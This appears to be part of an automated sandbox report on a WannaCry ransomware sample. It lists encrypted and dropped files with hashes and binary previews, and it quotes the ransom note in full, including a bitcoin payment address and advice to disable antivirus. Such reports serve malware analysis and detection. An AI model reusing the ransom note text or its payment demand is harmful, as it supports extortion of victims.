                                                  SHA-256:D60B4B8CD438FC833563F66BF313DD4961A843B36D4D6DE6CC329EEA27105D76
                                                  SHA-512:948E1819FCB41C48824B78C8D2CFFDEFC0504EF137B7CE45E3A0C768907760163D8B02429CAB5C4DE6CD406E5C1F8CF0A4C03CC93064B5E744D5966749151D61
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:y..m .. yO,n.Q)p....y8t.Uf?.h.........+.^w..Q..d.>.pq.t..\.0.....xh..u^.........>?C..!~9.r.B.]dJ.m.C...'y..z;...>...}\.@<.!RE]..{..`...;.<`..iu?..*....D.H.J..0..j?._..."Z..._.V.O..S....L."..G....<.6AQ...mb.!c.G..w....$..M..9..H\x/....5...H2.../...?.....(F.. ...G/.$.N......l.a2v.#)...P...A...c..&g!..d2.b..V..&dI.....O7X!..W....*1Y..a....Tn..]b]>..e....s.3.|.p=./0.>:...>BU.SZ,........A....39.F.3;g...n..,....6.2..nHZ.......'......p..i-V.d..LI...X..t.T.[.D..u......`<....TsA.-...c.....*...#.S..a.?.o|.*...+Gk....=.;.y...K+..S.R}N.T.0."..e7L2g>..:R.j..R..1.x.e.g........%~....bXK..j[........~...V2.e;.3...@.C.....gE{.s8JC;.g.......A.."@......:).hk.P.2W.l...L?.... .\.sf..[.....N.._...5....6.p@vwp.rQDyrk...P..:...w....:.D..!G.....P.L.(sr!....T..&0.........3....].W!_...B..(o....gs.x..l]q.NEV...p.E..K-p.=V M..Xq...g.V.qj...{..."?Y.]...".}.\t4..t.@$|..0..mf..P>u.....|.H...F.d."..+1...,k..mT..V=..w...7}...8.vY.*..2..Y.........*CL..8.-94.r.n...-nFL...a.....Z..`Ej1$.

                                                  C:\Users\user\Desktop\GAOBCVIQIJ\GAOBCVIQIJ.docx.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.8665997223515465
                                                  Encrypted:false
                                                  SSDEEP:24:bk7WO/SO62xECrETF3mRoy4BUqXYSf7vYmRPtC5CiZc4Wtk:bk7WO/SOvxECrEQX4XjYmptwCiZIk
                                                  MD5:500B0CAC082B48CD4644C17A1C4521A5
                                                  SHA1:35380CA92F229C5A2E8FC096C6DA5D763F0A6E15
                                                  SHA-256:51166FE827EAE7286501A52740DDBC20094169EA024FF8DE3B158AACCF5A028D
                                                  SHA-512:227FCBF193AB151FD9337F90637A3F055F16B89ABC8825F0A35E2EAB754447ABC2D1C2841568BEFD0DD2B9AF2E567515170DF052A2A7D70870D77925ADA5DAB6
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....HG....s..s.'.....J. ..f....z.].)....t.E...=..S..,kc..e.e#.U..#...G........T8...6..M1s.E}TI+la..~.>m..~...+..X......<..*...o....O@..}..._v...a..f3,.]..y0...q.._79 ...N............L...gp......=m]x!.g.o{sO..m.....xN..?E.ks.6.M..3....J4........4t.B...............|...]8........S.".d".7........~-S.J...P.#.e..e..C...J... .u..e..K.R.$...P1.9%..+;.|........QuB.].Xd....].k...*E..ts:%5.|...>.j.7.+.....{..6..Ue*J._L.+3..I......A.a....m~K`..,.c...../V.=N.....}R?d..cu.i.4!....IN.....&qo.Q......<...]......|.@RP..f.........'=..eg...%d>?@z0.....QH;..nR..Ks.N0.......+N.By.....!..,.gX1.2......).rw.b.....j....H.D..).>..O.Q......q.bYO$...@Y.!u..l".L..<..Y"..Xa.:b~.Y.v.h..k6...Y.dx"...i.?..~.l.....;2....q%3.?.....I.d../.t..){.........|..d.w..YAwCK...m...z....5Z...%..U.,y...H.uM.h....9...(..^..W$.V+.......x....b.7]. 7.z8S....~;.....c...L.w.!N...{.....B.\Z.~ .).n.i.....:!'xo..>.@<.e....L../.O..dare<cc....._#sjTb.n..M..\...8..M.'..WLj#..O]$...D.R=..!

                                                  C:\Users\user\Desktop\GAOBCVIQIJ\GAOBCVIQIJ.docx.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.8665997223515465
                                                  Encrypted:false
                                                  SSDEEP:24:bk7WO/SO62xECrETF3mRoy4BUqXYSf7vYmRPtC5CiZc4Wtk:bk7WO/SOvxECrEQX4XjYmptwCiZIk
                                                  MD5:500B0CAC082B48CD4644C17A1C4521A5
                                                  SHA1:35380CA92F229C5A2E8FC096C6DA5D763F0A6E15
                                                  SHA-256:51166FE827EAE7286501A52740DDBC20094169EA024FF8DE3B158AACCF5A028D
                                                  SHA-512:227FCBF193AB151FD9337F90637A3F055F16B89ABC8825F0A35E2EAB754447ABC2D1C2841568BEFD0DD2B9AF2E567515170DF052A2A7D70870D77925ADA5DAB6
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....HG....s..s.'.....J. ..f....z.].)....t.E...=..S..,kc..e.e#.U..#...G........T8...6..M1s.E}TI+la..~.>m..~...+..X......<..*...o....O@..}..._v...a..f3,.]..y0...q.._79 ...N............L...gp......=m]x!.g.o{sO..m.....xN..?E.ks.6.M..3....J4........4t.B...............|...]8........S.".d".7........~-S.J...P.#.e..e..C...J... .u..e..K.R.$...P1.9%..+;.|........QuB.].Xd....].k...*E..ts:%5.|...>.j.7.+.....{..6..Ue*J._L.+3..I......A.a....m~K`..,.c...../V.=N.....}R?d..cu.i.4!....IN.....&qo.Q......<...]......|.@RP..f.........'=..eg...%d>?@z0.....QH;..nR..Ks.N0.......+N.By.....!..,.gX1.2......).rw.b.....j....H.D..).>..O.Q......q.bYO$...@Y.!u..l".L..<..Y"..Xa.:b~.Y.v.h..k6...Y.dx"...i.?..~.l.....;2....q%3.?.....I.d../.t..){.........|..d.w..YAwCK...m...z....5Z...%..U.,y...H.uM.h....9...(..^..W$.V+.......x....b.7]. 7.z8S....~;.....c...L.w.!N...{.....B.\Z.~ .).n.i.....:!'xo..>.@<.e....L../.O..dare<cc....._#sjTb.n..M..\...8..M.'..WLj#..O]$...D.R=..!

                                                  C:\Users\user\Desktop\GAOBCVIQIJ\NVWZAPQSQL.jpg

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.79388529309449
                                                  Encrypted:false
                                                  SSDEEP:24:MSbJga/CJC5gmVwdm2VQyvrWImF/Jcl6qoC4nciiWw9N/boZ/LK4d45Ri/853/:J9qJdYXImF/Sl6akcivE1Ou++0Av
                                                  MD5:B7251413F6464A956DB6CBD36894B486
                                                  SHA1:7FEBBA3BAE89421703EC50A023FB62DD53930402
                                                  SHA-256:D6C814680636728B8FBD9F15E83638436780F748E2B4B5CE8DB1ED0564D97628
                                                  SHA-512:AD5BD0D32F390EA55E0E3DD3DE20854ECAA031945775F9E3CE21F4C343B5A8B0A090C3CF56C95BB2D94C464E165B2EA2A3B20E7CA70A52FEB44FAFA2F4436399
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:z.\2c......D..\NC.....e....A..Ih]S.)L.'@.......:..x.ci.._E.$8o$.X.=..Sm.W..)S&..lT3.....y...L../....w!f.p!..l..n...kC+`.-.<.@.V....:.)..o.'...c.U.1..Y-..........Y.<..{a.J.\..[..R.I..-..7....?!z`.......-...h....'.{q..... .Yu..\..R...C.(..^....yy+V...>........g.{.'.C..-41..y....>e....I..;.'..q.....>..2E.......A.8.U.\.|...:.{~..u6T,.F...y.:^`.H.. ..F?.>.oW....3...%.OKZ.m.wS.{...G~.U......5......6.Q.v...*.*Q.2...R.1V~.nPT..~.l..`a..Q.|....o..HA..?..X...W.(`..txY........N..7..%..i..".VX .`\".}._..v.......x.a.5t.....}.#`...S...%.-.1<.`.<l..N.J...K.M..M.$.A.....X>.V.....~.L..........S.....Q..2...~..T.-c.?@...............y.B}..#..G...R...."....}.7ac..`l...Y.."1.._K.........(.O.$.m....HQk~c.)9Od....M.4......h......]:<....8...`7,4.>..[.Y..;h...I......]....0.~..r!.lIg..8X,.W>jk+.........). ._..@......W..4`....B.4...d2wg.J........<.....PjJ...H..............nTm?...l..^....Z../-.R...'t.@D.D.@....T.)6.|...B....l.r.y...f`....O,H.Cx.$.....Y....4.~.4...6Rg...+

                                                  C:\Users\user\Desktop\GAOBCVIQIJ\NVWZAPQSQL.jpg.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.866502250755112
                                                  Encrypted:false
                                                  SSDEEP:24:bkJvcJKSQasVLTG5AFd49+NG14i+iQCHEbxf+9zGf8mhEhDSQsEhXn:bkpcJZQhxj49+NyJQCHEZM02hDSxen
                                                  MD5:0D7CB9822BCD1DEC0A952173A825EE10
                                                  SHA1:EADB21368B9C7BF69F65483F71C5C89A23E1542A
                                                  SHA-256:B10A4F5D6A21F86AA2C8C73E6A5A9FCD29DA8040B936F53357416AF0E4E95EA0
                                                  SHA-512:2B18B22AE95B0BB27685BCB68F3574AE4A4601400A3F590F3C3DE78C848AC7BCE7B200BA9F2F4F2E9E9CBFE829546BC90FA4530F2EF94370148938E828161858
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.......B.=..9.q.?I.....M.2..R.AF4....K@."..g........<)..RI....|.9...W.n..v(..9KrP.<s.......q .4b.P.;(.YX.....+.j..e.$..-.Ms.QS...WsZ}0...$>.......2..J.n...X.=.j..[..\. .,.%..........H.....O+3A...B...}..l..#.....E..f1..q..6_...W...M.3D.3c.....`.R[.d..>............D&..@....F...\oN.......9......gq...s.v%.......,..^.Ulur./)s.uA.F...NK.!...$.:5.D..v.-.MI../.....L..b..J..o.. Y.....=k.....$....q.4p..jQ.kCZ..5..2.>J%....s..ffA....Ml`.. ./.{.rZP...].B.O..Z.).".lK......]"3.E.....M.9N. [.&.{..M.lv.*.M..(..j...~.z7.....s,F...N..>...V.J.....t.3[.DJ.....ry...e....R.vJ.............d..kd..9.x.R.p...=....mU..(0...T%..xs.W..R;#.D_.......I.6e..4..)@.0,./..Z..2@.o.=0{L.3.! E.p..E.:y...|.......Vp..x.@5...nsiU.eN...&<5D..{H...F.....(..L.:.~l.cl.1P8+.....m?.....:[[.|.%.....)/^2.......*I....O...#...(p.":c.Vn...u...a.K...Uk-OA.m.{$.....a;...0T]Nw..8...P....{..$...h4.PuT..9.,u.6.DPu...;.v...{i..$.}.l(....c-It.F.@i....(.....|.C....1?....~.W|.n.>."..;.h.u...'.Y@

                                                  C:\Users\user\Desktop\GAOBCVIQIJ\NVWZAPQSQL.jpg.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.866502250755112
                                                  Encrypted:false
                                                  SSDEEP:24:bkJvcJKSQasVLTG5AFd49+NG14i+iQCHEbxf+9zGf8mhEhDSQsEhXn:bkpcJZQhxj49+NyJQCHEZM02hDSxen
                                                  MD5:0D7CB9822BCD1DEC0A952173A825EE10
                                                  SHA1:EADB21368B9C7BF69F65483F71C5C89A23E1542A
                                                  SHA-256:B10A4F5D6A21F86AA2C8C73E6A5A9FCD29DA8040B936F53357416AF0E4E95EA0
                                                  SHA-512:2B18B22AE95B0BB27685BCB68F3574AE4A4601400A3F590F3C3DE78C848AC7BCE7B200BA9F2F4F2E9E9CBFE829546BC90FA4530F2EF94370148938E828161858
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.......B.=..9.q.?I.....M.2..R.AF4....K@."..g........<)..RI....|.9...W.n..v(..9KrP.<s.......q .4b.P.;(.YX.....+.j..e.$..-.Ms.QS...WsZ}0...$>.......2..J.n...X.=.j..[..\. .,.%..........H.....O+3A...B...}..l..#.....E..f1..q..6_...W...M.3D.3c.....`.R[.d..>............D&..@....F...\oN.......9......gq...s.v%.......,..^.Ulur./)s.uA.F...NK.!...$.:5.D..v.-.MI../.....L..b..J..o.. Y.....=k.....$....q.4p..jQ.kCZ..5..2.>J%....s..ffA....Ml`.. ./.{.rZP...].B.O..Z.).".lK......]"3.E.....M.9N. [.&.{..M.lv.*.M..(..j...~.z7.....s,F...N..>...V.J.....t.3[.DJ.....ry...e....R.vJ.............d..kd..9.x.R.p...=....mU..(0...T%..xs.W..R;#.D_.......I.6e..4..)@.0,./..Z..2@.o.=0{L.3.! E.p..E.:y...|.......Vp..x.@5...nsiU.eN...&<5D..{H...F.....(..L.:.~l.cl.1P8+.....m?.....:[[.|.%.....)/^2.......*I....O...#...(p.":c.Vn...u...a.K...Uk-OA.m.{$.....a;...0T]Nw..8...P....{..$...h4.PuT..9.,u.6.DPu...;.v...{i..$.}.l(....c-It.F.@i....(.....|.C....1?....~.W|.n.>."..;.h.u...'.Y@

                                                  C:\Users\user\Desktop\GAOBCVIQIJ\PWCCAWLGRE.xlsx

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.820132533577611
                                                  Encrypted:false
                                                  SSDEEP:24:+8tgG04kj0G0B1ZjjeY5jX9zq7MiAlkBxwtVaH4PYOYdZ5g:Ls4kITjTPiMibwt64gOF
                                                  MD5:6196312BC11ECCCE2C9ABF8942EAF8DE
                                                  SHA1:FC1636AFDED96DEF170ED53DD55824968C0158E5
                                                  SHA-256:44DDE71FBE214973166A773382EC2DE4C9EE893DC2723CE78C73338F26FE268E
                                                  SHA-512:D2ED06C37C721A5AB8BE97EE36C6475ABEFD7EEC132D4FCA2C61A09AB31448A2835C724CFA77094FAF03BFD3C0C794F986E0BB5A012722A5A638596B68C99FC8
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.:..|6H.%;..XS.../....~V.$..yR.r"..._..,....`PGU\._...O.O.S.$..C.... j8.^....u}.u.b*...]5.<..,....z..0...s.#-...].3...%g.....N)..6>...X.....A9..9x.k>@.....{.K}o.Mh...nR.#...U...Q..a.......W: ..}.9..f?>.v.:.. o..z....r?[.c.y. Z.2.7fsJ..D...y@.K.l#...1.....B....C...2.".o^;v.;p....o....<.>.2...5....Q...2...f.i..D.).md.&....W..p_.6...%.R.9.w..H..Wp.UlL....}...&.N2o ..KWx..a....s$.k.Ui.p.UB.z...x.....A=0~.......-.[.Sv..V....h.'.....S....In...3...+g....-.O0..w....J.T.....:.....F.u..E.liQ..(I.y...E,.'.X`....QE.g.X...6..?HE8...7.!.X....&..!.J2+.*..J.....3..DpxwS{...T.h..E.........L..........^c}..:..........s....=.2..f.3v. P..pcQ>...Y..'..9..d.K...m.S.^.,Cx.8..B........)Is>C..#.fN.DnK.....D.D.Cl.....P....r,%+...g7gK...Y...P1Ud}v....S...l/....8T..).Ro..S[........B;.....{l.......x.....u.A...2.......v.S^...Pq.i?.....R7;..$Q.)..g+.z".u.J`....l.Z...K..k.yW....#eG..B_.Z?....3..Fk..c....s..UnQ.W.7.+....:..._..k....;bQ..!.6F....J.E...O.H..

                                                  C:\Users\user\Desktop\GAOBCVIQIJ\PWCCAWLGRE.xlsx.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.856216816598012
                                                  Encrypted:false
                                                  SSDEEP:24:bkRpnpZhJLd9Txn2RcbTNf3clU6zvJXHfyQ0b525d2b6Yl0+:bkRpn5v9TN9XNfMlU6zvF6Q0b56ngJ
                                                  MD5:C0448431C09E56275A1213E33765F314
                                                  SHA1:4AA0F0729D35BA49D457189A0878E61F0C446003
                                                  SHA-256:6D6B922634D89A0F1511655D4BDCFA29E8D3CF44BE9114EA20A67B6E3272647C
                                                  SHA-512:3BB870574A32991D7600CF9F7F635FAF7ED588523D9CB0C401FCAD4B2997C54F66EE521F78836691A1AA5C36BCFE5FB4A1A61F00D54E14172D3FFD6008DDF78B
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....K....^CR.R0...K.ka..^..j..a..h...j@c.h.)(..p....=..]`.O......{)...h:S!..\`t..d..F....l...Y.f..~.". I.uGG.i].,..`..#wDh(.hcEt.~pgE2y..(I@...p._,......"..w,4Y.._.wU ....9RP..X...yc.....]....)@r..Ki.~$K....\I4.Q..............#.L..G...a\....j.}............L ...$..tx.0Z.....(.\.....Q.3'....Z..-Q~..j.C.]$....._Rf...yD..)I...b......j.H....aw.a.S.....=).....T+.?.o.;+a...0...'...a.~.z.t.-....>I3..."..+<.R.||<@..c....2.q...mIf..V.i.........6.>u.I...|..l.....u...%......fA...;;+.....?..Mwk....N.....d.......p>.|-.'....a.R2..Bu/...A..j........C..3F..LJ.......k...%.b.>...n...dz.J.r....1.sV.)....o....c..._u.... .%I......H...'.TG',..-X.6.U.....qHn....`)j...WB.D6..\...zB.(.....@+..5..R..(..q.....I..I......Tt.(...-.F..(d..5....s,"..G.*>Y.xx..IG..V...... ...._4.TZ.$l.k....+..Y.&.c..........^.2=.!...MMAwu....r...._.-.9.o..Rq.m-t...q........:p..c...JNY."m..?D..........L...F.......be...)..Q.......h...2..!,.....2.D...l{..B>. L.K..c..z.p

                                                  C:\Users\user\Desktop\GAOBCVIQIJ\PWCCAWLGRE.xlsx.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.856216816598012
                                                  Encrypted:false
                                                  SSDEEP:24:bkRpnpZhJLd9Txn2RcbTNf3clU6zvJXHfyQ0b525d2b6Yl0+:bkRpn5v9TN9XNfMlU6zvF6Q0b56ngJ
                                                  MD5:C0448431C09E56275A1213E33765F314
                                                  SHA1:4AA0F0729D35BA49D457189A0878E61F0C446003
                                                  SHA-256:6D6B922634D89A0F1511655D4BDCFA29E8D3CF44BE9114EA20A67B6E3272647C
                                                  SHA-512:3BB870574A32991D7600CF9F7F635FAF7ED588523D9CB0C401FCAD4B2997C54F66EE521F78836691A1AA5C36BCFE5FB4A1A61F00D54E14172D3FFD6008DDF78B
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....K....^CR.R0...K.ka..^..j..a..h...j@c.h.)(..p....=..]`.O......{)...h:S!..\`t..d..F....l...Y.f..~.". I.uGG.i].,..`..#wDh(.hcEt.~pgE2y..(I@...p._,......"..w,4Y.._.wU ....9RP..X...yc.....]....)@r..Ki.~$K....\I4.Q..............#.L..G...a\....j.}............L ...$..tx.0Z.....(.\.....Q.3'....Z..-Q~..j.C.]$....._Rf...yD..)I...b......j.H....aw.a.S.....=).....T+.?.o.;+a...0...'...a.~.z.t.-....>I3..."..+<.R.||<@..c....2.q...mIf..V.i.........6.>u.I...|..l.....u...%......fA...;;+.....?..Mwk....N.....d.......p>.|-.'....a.R2..Bu/...A..j........C..3F..LJ.......k...%.b.>...n...dz.J.r....1.sV.)....o....c..._u.... .%I......H...'.TG',..-X.6.U.....qHn....`)j...WB.D6..\...zB.(.....@+..5..R..(..q.....I..I......Tt.(...-.F..(d..5....s,"..G.*>Y.xx..IG..V...... ...._4.TZ.$l.k....+..Y.&.c..........^.2=.!...MMAwu....r...._.-.9.o..Rq.m-t...q........:p..c...JNY."m..?D..........L...F.......be...)..Q.......h...2..!,.....2.D...l{..B>. L.K..c..z.p

                                                  C:\Users\user\Desktop\LSBIHQFDVT.docx

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.820916599091204
                                                  Encrypted:false
                                                  SSDEEP:24:5O1kiFV7z2wSVqmn0t/mTaNqj/hQ4xOqXkGeP8dCnXfXsWlfQajL:M1kmiIt/rqjO4xu6CnvlfzjL
                                                  MD5:9269F2A78EA195E3DDAF8439CB6CF218
                                                  SHA1:1F6FD3935FEC71946192D9D03FA1B8304E35D93E
                                                  SHA-256:E17675BA873A3B28FDA9D70183C24C369C1D1FEFE8AD9912B2F0EC0DD8FC4FC0
                                                  SHA-512:947F0B3F62CA1B73B25C24BA5B21651D7EA126EF2621FA33787653BCD97D4D1E2188FE087186BBAA7D84A327B54C2B5F9EFE5D2F1B0BC44C35CC732801212FE4
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:+...W.2..D|.GS|..'t.c_.`S.u..Sh..*.. z... ..q....?$.h ./ZmA..^2>Y|.].W)pU$..T..N`..&...,]..E..M1._....q=....^.qv...~.N.......{..Y.D.!...S.,.bv.a.6s........hI.....T\..r..eT..c.).....ZKC......\ #......0.a.S...MH....o .h&........../m.{&t.w.....W..(}Vb.].^.Z..vJ9]........n.@..bO..<..dpV.3[.G.G,..W..A8t.x..y.S....{)..!.G.o)g.F,J.!.ZW.....i[.|..r..2%..R]G.E...k..n$..."H...{.=g..L;aG."83..u3....i."..}.B.|X....T|.`...vH.#.............Y.`A...W. 3n(.;Q.;.O..{8~.|iR....M..y...Dl..#}G.....3.., e..\`PZ"...0:...z.f....`w>..b.n._..~......../..GJb..Qru..v..B2\Pa...^......H[?*.(..V..wXv.d.R.;.~....HLZ.Klp..+(..KY.J.=..V.C....H_...6.......-.`......,..R.`.\.O...../."..9..........L...J..c.-... ..,p.w.5.R...P..j.g=.d..V....c...lH..(...L..f..|o..=..k.|....>....}......wG2....Rd....7*ai`...d!...)v5..n...@.. ..yF.........p.._.`..........F...)K.=...`Q._..Oq...%R+D..V.......H.J....:.U...yo.8.Vw..3.c...P.+3.)F..l.GN..g.%.>c...e...9.j..r.}..'.."...p@.i.V.\.gI.{D

                                                  C:\Users\user\Desktop\LSBIHQFDVT.docx.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.855551687934645
                                                  Encrypted:false
                                                  SSDEEP:24:bkFbQbH0RIDhQR3taJXrcnlbldyk9EsPCrPWsW9JG/wYxhZwKikZEx9ldj:bkFeFQR3+cnl5p0TsG/PhZFi6Enj
                                                  MD5:E81551C157E4AE268B308EE4B1979909
                                                  SHA1:E3EA6918DCAEACA244E4513468F83BA9179CE18E
                                                  SHA-256:BEC985EA54272301063B585F43681F98A2B2E589219558D0C97D7E2A206DF749
                                                  SHA-512:FE592D4B4C4776A1BBAF0711F76FD7391A9868E1A2FC8DCC14E24214E8240DB5CA0B9AF0D6759A204AC44CC2B891013BFAD73D3C5735965DA274EADBFED05AB3
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....*...).B..CdMd....JbK.K..B.(@...`[..({$.2..~0./..>T...B.s|.E.m....$.7.&.C. t...._.K...K9(.B..JH.%S.J.....@..r.(...*...E.mG...).#....6;Ki.(...C.....b.D.. ~..n8b..x=|.t...j}..n.w?Q..ME;..j\..n&s.6..Qu....NC.R....."..^@.o 7A...F9o..(..E.k]3Oc................@...9j>..tk..O?.H,.....P..Cp...n2.q.yW.......c\I...|...X.L>.Qtp0..lh.....R.a...]#.D...R...8|.5..IR.4..i$. ..O.%....a"j.!..R.p.....pD..6jU).|.....ax.....M.<6.."6.b./,BJ]..c...v..5C.t...O..Fe....y.F.sv$Xmp.....ISi........Y..>..T..`...aox9..d..b....z.........z;...EIdU5.5....'..K.H{.......B!.....>b.1.;d....u}V.^.r..WJ...}.... .......u........0..o...3.x.>V...#..3..F.$.b0....FrCU[#.....*........>}...E.N.-.!...|&.y\..AH.e...:..8,)<.7......x.....BL5:.77...j.M'.7b.[..m..h..h>..7E.sYd..1.'...M#e.o..p`...m.x.K.5...A....n.#.-.....@...9.......U../...ii.]g..`.(5...e\6....1,...vx....w.9X...........;.h......$.zC.s!z.........T..FJN.B..=...Y....Tr.-.L.._c..$joD.A..%..]s...0.B...;c.-..a.@...Zr

                                                  C:\Users\user\Desktop\LSBIHQFDVT.docx.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.855551687934645
                                                  Encrypted:false
                                                  SSDEEP:24:bkFbQbH0RIDhQR3taJXrcnlbldyk9EsPCrPWsW9JG/wYxhZwKikZEx9ldj:bkFeFQR3+cnl5p0TsG/PhZFi6Enj
                                                  MD5:E81551C157E4AE268B308EE4B1979909
                                                  SHA1:E3EA6918DCAEACA244E4513468F83BA9179CE18E
                                                  SHA-256:BEC985EA54272301063B585F43681F98A2B2E589219558D0C97D7E2A206DF749
                                                  SHA-512:FE592D4B4C4776A1BBAF0711F76FD7391A9868E1A2FC8DCC14E24214E8240DB5CA0B9AF0D6759A204AC44CC2B891013BFAD73D3C5735965DA274EADBFED05AB3
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....*...).B..CdMd....JbK.K..B.(@...`[..({$.2..~0./..>T...B.s|.E.m....$.7.&.C. t...._.K...K9(.B..JH.%S.J.....@..r.(...*...E.mG...).#....6;Ki.(...C.....b.D.. ~..n8b..x=|.t...j}..n.w?Q..ME;..j\..n&s.6..Qu....NC.R....."..^@.o 7A...F9o..(..E.k]3Oc................@...9j>..tk..O?.H,.....P..Cp...n2.q.yW.......c\I...|...X.L>.Qtp0..lh.....R.a...]#.D...R...8|.5..IR.4..i$. ..O.%....a"j.!..R.p.....pD..6jU).|.....ax.....M.<6.."6.b./,BJ]..c...v..5C.t...O..Fe....y.F.sv$Xmp.....ISi........Y..>..T..`...aox9..d..b....z.........z;...EIdU5.5....'..K.H{.......B!.....>b.1.;d....u}V.^.r..WJ...}.... .......u........0..o...3.x.>V...#..3..F.$.b0....FrCU[#.....*........>}...E.N.-.!...|&.y\..AH.e...:..8,)<.7......x.....BL5:.77...j.M'.7b.[..m..h..h>..7E.sYd..1.'...M#e.o..p`...m.x.K.5...A....n.#.-.....@...9.......U../...ii.]g..`.(5...e\6....1,...vx....w.9X...........;.h......$.zC.s!z.........T..FJN.B..=...Y....Tr.-.L.._c..$joD.A..%..]s...0.B...;c.-..a.@...Zr

                                                  C:\Users\user\Desktop\LSBIHQFDVT\@Please_Read_Me@.txt

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):933
                                                  Entropy (8bit):4.708686542546707
                                                  Encrypted:false
                                                  SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                                  MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                                  SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                                  SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                                  SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

                                                  C:\Users\user\Desktop\LSBIHQFDVT\GAOBCVIQIJ.pdf

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.820494558970135
                                                  Encrypted:false
                                                  SSDEEP:24:ADm4t/ll9llP3Vf4vQHGsbpkAjRx7nVHXhfFC3UwxYv:SmkL9lR3VAvopJrbC3jxYv
                                                  MD5:B834AC3D1BDF3E7BEC7500426F156D72
                                                  SHA1:5164996DEB6A74DF6500CF13F3DD16A30A6DD30D
                                                  SHA-256:7577B2F5654E5011AD38A6E87594F1A4093DBCC4CCBCC36FC3A4E854A66BB066
                                                  SHA-512:1F906A1FCDBDBA11286BE25423C98E8D2065DB0F263DA6A95433FF405AA0021704558DAB34679A00B7AA1CD026F5B0F27F3030F1600BD3C824582C5164D5ABC1
                                                  Malicious:true
                                                  Reputation:unknown
